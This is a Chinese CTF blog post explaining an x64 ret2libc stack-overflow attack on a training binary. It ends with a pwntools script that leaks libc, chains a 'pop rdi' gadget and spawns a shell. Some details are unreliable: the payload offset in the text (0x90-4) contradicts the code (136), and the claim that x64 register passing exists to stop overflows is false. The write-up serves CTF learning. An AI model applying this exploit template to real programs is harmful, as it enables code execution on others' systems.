<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwn,二进制,exp," />










<meta name="description" content="前言原来PWN题都是用ubuntu做的啊！入门以来的这个学期我都用的是kali真的是太捞了，期间出现了各种各样莫名其妙的问题，这是我在XMAN4遇到libcsearcher时碰到搜索结果不匹配时发现的，尴尬的是组会时槐师傅（其实是所有师傅）都说用ubuntu，原来他们以前有教过，谁叫我是半路出家，头铁的用了半年kali。 X64汇编与X86最大的不同之处就是X64的地址，寄存器，数据，都变成了8个">
<meta name="keywords" content="pwn,二进制,exp">
<meta property="og:type" content="article">
<meta property="og:title" content="X64_ret2libc">
<meta property="og:url" content="http://yoursite.com/2019/06/02/X64-ret2libc/index.html">
<meta property="og:site_name" content="Ice_bag的技术博客，欢迎！">
<meta property="og:description" content="前言原来PWN题都是用ubuntu做的啊！入门以来的这个学期我都用的是kali真的是太捞了，期间出现了各种各样莫名其妙的问题，这是我在XMAN4遇到libcsearcher时碰到搜索结果不匹配时发现的，尴尬的是组会时槐师傅（其实是所有师傅）都说用ubuntu，原来他们以前有教过，谁叫我是半路出家，头铁的用了半年kali。 X64汇编与X86最大的不同之处就是X64的地址，寄存器，数据，都变成了8个">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-06-01T17:52:05.334Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="X64_ret2libc">
<meta name="twitter:description" content="前言原来PWN题都是用ubuntu做的啊！入门以来的这个学期我都用的是kali真的是太捞了，期间出现了各种各样莫名其妙的问题，这是我在XMAN4遇到libcsearcher时碰到搜索结果不匹配时发现的，尴尬的是组会时槐师傅（其实是所有师傅）都说用ubuntu，原来他们以前有教过，谁叫我是半路出家，头铁的用了半年kali。 X64汇编与X86最大的不同之处就是X64的地址，寄存器，数据，都变成了8个">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/06/02/X64-ret2libc/"/>





  <title>X64_ret2libc | Ice_bag的技术博客，欢迎！</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Ice_bag的技术博客，欢迎！</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">keen on hack and geek :~)</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/关于我" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/标签" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/文章分类" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br />
            
            站点地图
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/06/02/X64-ret2libc/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ice_bag(WXJ)">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ice_bag的技术博客，欢迎！">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">X64_ret2libc</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-06-02T00:59:55+08:00">
                2019-06-02
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index">
                    <span itemprop="name">pwn</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>原来PWN题都是用ubuntu做的啊！入门以来的这个学期我都用的是kali真的是太捞了，期间出现了各种各样莫名其妙的问题，<br>这是我在XMAN4遇到libcsearcher时碰到搜索结果不匹配时发现的，尴尬的是组会时槐师傅（其实是所有师傅）都说用ubuntu，<br>原来他们以前有教过，谁叫我是半路出家，头铁的用了半年kali。</p>
<h1 id="X64汇编"><a href="#X64汇编" class="headerlink" title="X64汇编"></a>X64汇编</h1><p>与X86最大的不同之处就是X64的地址，寄存器，数据，都变成了8个byte，更重要的是，为了防止对栈溢出的滥用，X64不再采用<br>X86的压栈式的传参方式，而是采用专用的寄存器保存函数的参数，它们是RDI，RSI，RDX，RCX，R8和 R9。只有参数数量大于6<br>个时才会使用栈保存后面的参数。</p>
<h2 id="内存异常"><a href="#内存异常" class="headerlink" title="内存异常"></a>内存异常</h2><p>可以使用的内存地址不超过0x00007fffffffffff,否则会抛出异常（非法访问）。</p>
<h1 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h1><p>存在任意长read，会导致栈溢出。</p>
<h1 id="劫持程序流"><a href="#劫持程序流" class="headerlink" title="劫持程序流"></a>劫持程序流</h1><p>与X86类似，栈溢出覆盖返回地址，</p>
<h1 id="garget"><a href="#garget" class="headerlink" title="garget"></a>garget</h1><p>为了达成某些目的，我们需要给调用的函数合适的参数，如’/bin/sh’,在X86中，直接将参数写在payload里面，伪造栈帧，因为<br>它通过压栈传参。而X64就要复杂一些，构造栈帧不再有效，需要将参数传入寄存器，而这就是我们寻找garget的原因。</p>
<h2 id="garget是什么"><a href="#garget是什么" class="headerlink" title="garget是什么"></a>garget是什么</h2><p>garget就是程序中的一句汇编语句，可以连续执行，一条接着一条，形如：pop xxx;ret;达到给寄存器赋值的目的，还可以连续不断的<br>延伸下去。</p>
<h1 id="寻找-garget"><a href="#寻找-garget" class="headerlink" title="寻找 garget"></a>寻找 garget</h1><p>对于这道题，由于采用了动态链接，程序本身并不大，所以找不到太多合适的garget，有一个操作就是在libc中寻找，libc多大啊，<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt;ROPgarget --binary libc.so.6 --only &quot;ret|pop&quot; | grep &quot;rdi&quot;</span><br></pre></td></tr></table></figure></p>
<p>因为我们的最终目标是执行system(“/bin/sh”)所以我们需要一个pop rdi;ret,这是可以找的到的。</p>
<h1 id="计算libc基址"><a href="#计算libc基址" class="headerlink" title="计算libc基址"></a>计算libc基址</h1><p>程序提供了libc真实地址，libc偏移量计算与X86下计算方法相同。<br>再计算出”bin/sh”,pop_ret的真实地址，可以开始构建payload了。</p>
<h1 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h1><p>‘a’*(0x90-4)+pop_ret_addr+binsh_addr+sys_addr</p>
<h1 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">#context.log_level=&apos;debug&apos;</span><br><span class="line">p=process(&apos;./level4&apos;)</span><br><span class="line">libc=ELF(&apos;/lib/x86_64-linux-gnu/libc.so.6&apos;)</span><br><span class="line">binsh_addr_offset = next(libc.search(&apos;/bin/sh&apos;)) -libc.symbols[&apos;system&apos;]</span><br><span class="line">pop_ret_offset = 0x0000000000021102 - libc.symbols[&apos;system&apos;]</span><br><span class="line">system_addr_str = p.recvuntil(&apos;\n&apos;)</span><br><span class="line">system_addr = int(system_addr_str,16)</span><br><span class="line">binsh_addr = system_addr + binsh_addr_offset</span><br><span class="line">pop_ret_addr = system_addr + pop_ret_offset</span><br><span class="line">payload=&apos;a&apos;*136+p64(pop_ret_addr)+p64(binsh_addr)+p64(system_addr)</span><br><span class="line">p.recv()</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
            <a href="/tags/二进制/" rel="tag"># 二进制</a>
          
            <a href="/tags/exp/" rel="tag"># exp</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/05/09/jarvisoj-xman3/" rel="next" title="jarvisoj_xman3">
                <i class="fa fa-chevron-left"></i> jarvisoj_xman3
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/06/13/page/" rel="prev" title="page">
                page <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Ice_bag(WXJ)</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">34</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/文章分类/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/标签/index.html">
                  <span class="site-state-item-count">24</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#X64汇编"><span class="nav-number">2.</span> <span class="nav-text">X64汇编</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#内存异常"><span class="nav-number">2.1.</span> <span class="nav-text">内存异常</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞"><span class="nav-number">3.</span> <span class="nav-text">漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#劫持程序流"><span class="nav-number">4.</span> <span class="nav-text">劫持程序流</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#garget"><span class="nav-number">5.</span> <span class="nav-text">garget</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#garget是什么"><span class="nav-number">5.1.</span> <span class="nav-text">garget是什么</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#寻找-garget"><span class="nav-number">6.</span> <span class="nav-text">寻找 garget</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#计算libc基址"><span class="nav-number">7.</span> <span class="nav-text">计算libc基址</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#payload"><span class="nav-number">8.</span> <span class="nav-text">payload</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#exp"><span class="nav-number">9.</span> <span class="nav-text">exp</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ice_bag(WXJ)</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>